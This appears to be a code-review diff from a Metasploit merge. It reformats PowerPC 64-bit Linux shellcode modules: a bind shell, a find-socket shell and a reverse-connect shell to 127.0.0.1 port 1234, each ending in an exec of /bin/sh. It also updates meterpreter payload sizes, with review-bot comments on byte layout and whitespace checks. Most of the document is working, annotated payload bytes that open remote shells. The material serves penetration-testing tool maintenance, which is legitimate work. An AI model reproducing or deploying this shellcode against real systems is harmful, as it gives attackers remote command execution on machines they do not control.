"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
"\xfb\x61\xff\xf9" + # stdu r27,-8(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
"\x3e\xe0\xff\x02" + # lis r23,-254 #
"\x62\xf7\x04\xd2" + # ori r23,r23,1234 #
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
"\x7c\x36\x0b\x78" + # mr r22,r1 #
"\xfb\x21\xff\xf9" + # stdu r25,-8(r1) #
"\xfa\xc1\xff\xf9" + # stdu r22,-8(r1) #
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x03" + # addi r3,r29,-509 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x05" + # addi r3,r29,-507 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x06" + # addi r3,r29,-506 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x7c\x75\x1b\x78" + # mr r21,r3 #
"\x7f\x64\xdb\x78" + # mr r4,r27 #
"\x7e\xa3\xab\x78" + # mr r3,r21 #
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
"\x44\xff\xff\x02" + # sc #
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
"\x40\x80\xff\xec" + # bge+ <bndsockcode64+148> #
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
"\x40\x82\xff\xfd" + # bnel+ <bndsockcode64+172> #
"\x7f\xc8\x02\xa6" + # mflr r30 #
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
"\x44\xff\xff\x02" + # sc #
"/bin/sh"
}
))
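Review bot: the hunk mixes `stwu` (4-byte slots) for the family/port word of the sockaddr and `stdu` (8-byte slots) for the socketcall argument array, which is right for 64-bit arguments but easy to misread as an inconsistency; since every line is being rewritten anyway, a comment marking where the sockaddr ends and the argument array begins would help. Byte-wise nothing changes, and `'LPORT' => [ 58, 'n' ]` still hits the immediate of `ori r23,r23,1234`.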

View File

@ -32,47 +32,47 @@ module MetasploitModule
'CPORT' => [ 86, 'n' ],
},
'Payload' =>
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
"\x3b\xa0\x01\xff" +# li r29,511 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x7c\x3c\x0b\x78" +# mr r28,r1 #
"\x3b\x7d\xfe\x11" +# addi r27,r29,-495 #
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
"\x7c\x3a\x0b\x78" +# mr r26,r1 #
"\xfb\x41\xff\xf9" +# stdu r26,-8(r1) #
"\xfb\x81\xff\xf9" +# stdu r28,-8(r1) #
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
"\x3b\xff\x01\xff" +# addi r31,r31,511 #
"\x3b\xff\xfe\x02" +# addi r31,r31,-510 #
"\x38\x21\x01\xff" +# addi r1,r1,511 #
"\x38\x21\xfe\x09" +# addi r1,r1,-503 #
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x08" +# addi r3,r29,-504 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x3b\x3c\x01\xff" +# addi r25,r28,511 #
"\xa3\x39\xfe\x03" +# lhz r25,-509(r25) #
"\x28\x19\x04\xd2" +# cmplwi r25,1234 #
"\x40\x82\xff\xd0" +# bne+ <fndsockcode64+40> #
"\x3b\x1d\xfe\x03" +# addi r24,r29,-509 #
"\x7f\x04\xc3\x78" +# mr r4,r24 #
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
"\x44\xff\xff\x02" +# sc #
"\x37\x18\xff\xff" +# addic. r24,r24,-1 #
"\x40\x80\xff\xec" +# bge+ <fndsockcode64+96> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel+ <fndsockcode64+120> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
"\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) #
"\xf8\x61\xff\xf9" +# stdu r3,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
"\x44\xff\xff\x02" +# sc #
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
"\x3b\xa0\x01\xff" + # li r29,511 #
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
"\x7c\x3c\x0b\x78" + # mr r28,r1 #
"\x3b\x7d\xfe\x11" + # addi r27,r29,-495 #
"\x97\x61\xff\xfc" + # stwu r27,-4(r1) #
"\x7c\x3a\x0b\x78" + # mr r26,r1 #
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
"\x3b\xff\x01\xff" + # addi r31,r31,511 #
"\x3b\xff\xfe\x02" + # addi r31,r31,-510 #
"\x38\x21\x01\xff" + # addi r1,r1,511 #
"\x38\x21\xfe\x09" + # addi r1,r1,-503 #
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x08" + # addi r3,r29,-504 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x3b\x3c\x01\xff" + # addi r25,r28,511 #
"\xa3\x39\xfe\x03" + # lhz r25,-509(r25) #
"\x28\x19\x04\xd2" + # cmplwi r25,1234 #
"\x40\x82\xff\xd0" + # bne+ <fndsockcode64+40> #
"\x3b\x1d\xfe\x03" + # addi r24,r29,-509 #
"\x7f\x04\xc3\x78" + # mr r4,r24 #
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
"\x44\xff\xff\x02" + # sc #
"\x37\x18\xff\xff" + # addic. r24,r24,-1 #
"\x40\x80\xff\xec" + # bge+ <fndsockcode64+96> #
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
"\x40\x82\xff\xfd" + # bnel+ <fndsockcode64+120> #
"\x7f\xc8\x02\xa6" + # mflr r30 #
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
"\x44\xff\xff\x02" + # sc #
"/bin/sh"
}
))

View File

@ -33,50 +33,50 @@ module MetasploitModule
'LPORT' => [ 62, 'n' ],
},
'Payload' =>
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
"\x3b\xa0\x01\xff" +# li r29,511 #
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 #
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 #
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
"\xfb\x81\xff\xf9" +# stdu r28,-8(r1) #
"\xfb\x61\xff\xf9" +# stdu r27,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 #
"\x3e\xe0\x7f\x00" +# lis r23,32512 #
"\x62\xf7\x00\x01" +# ori r23,r23,1 #
"\x3a\xc0\x04\xd2" +# li r22,1234 #
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) #
"\x96\xc1\xff\xfc" +# stwu r22,-4(r1) #
"\x93\x61\xff\xfe" +# stw r27,-2(r1) #
"\x7c\x35\x0b\x78" +# mr r21,r1 #
"\xfb\x21\xff\xf9" +# stdu r25,-8(r1) #
"\xfa\xa1\xff\xf9" +# stdu r21,-8(r1) #
"\xfb\x41\xff\xf9" +# stdu r26,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x04" +# addi r3,r29,-508 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7f\x64\xdb\x78" +# mr r4,r27 #
"\x7f\x43\xd3\x78" +# mr r3,r26 #
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
"\x44\xff\xff\x02" +# sc #
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 #
"\x40\x80\xff\xec" +# bge+ <cntsockcode64+108> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel+ <cntsockcode64+132> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
"\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) #
"\xf8\x61\xff\xf9" +# stdu r3,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
"\x44\xff\xff\x02" +# sc #
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
"\x3b\xa0\x01\xff" + # li r29,511 #
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
"\xfb\x61\xff\xf9" + # stdu r27,-8(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
"\x3e\xe0\x7f\x00" + # lis r23,32512 #
"\x62\xf7\x00\x01" + # ori r23,r23,1 #
"\x3a\xc0\x04\xd2" + # li r22,1234 #
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
"\x96\xc1\xff\xfc" + # stwu r22,-4(r1) #
"\x93\x61\xff\xfe" + # stw r27,-2(r1) #
"\x7c\x35\x0b\x78" + # mr r21,r1 #
"\xfb\x21\xff\xf9" + # stdu r25,-8(r1) #
"\xfa\xa1\xff\xf9" + # stdu r21,-8(r1) #
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x04" + # addi r3,r29,-508 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x7f\x64\xdb\x78" + # mr r4,r27 #
"\x7f\x43\xd3\x78" + # mr r3,r26 #
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
"\x44\xff\xff\x02" + # sc #
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
"\x40\x80\xff\xec" + # bge+ <cntsockcode64+108> #
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
"\x40\x82\xff\xfd" + # bnel+ <cntsockcode64+132> #
"\x7f\xc8\x02\xa6" + # mflr r30 #
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
"\x44\xff\xff\x02" + # sc #
"/bin/sh"
}
))
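Review bot: across the shellcode hunks in this merge the edit is the same one-space change before each `#`, so rather than eyeballing each file, `git diff -w --stat` against the parent should report zero changed lines for these payload modules; if it does not, something other than whitespace moved and the CachedSize values for the affected modules would need regenerating. Suggest recording that check in the PR description.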

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux'
module MetasploitModule
CachedSize = 1079888
CachedSize = 1079936
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux'
module MetasploitModule
CachedSize = 1079888
CachedSize = 1079936
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions
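Review bot: both meterpreter_ppc64le_linux hunks move CachedSize from 1079888 to 1079936 in step, which is what you expect when the two modules embed the same payload binary; please name the payload bundle version that produced these sizes in the commit message so the next bump can be traced to its source rather than rediscovered by regenerating.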

Some files were not shown because too many files have changed in this diff.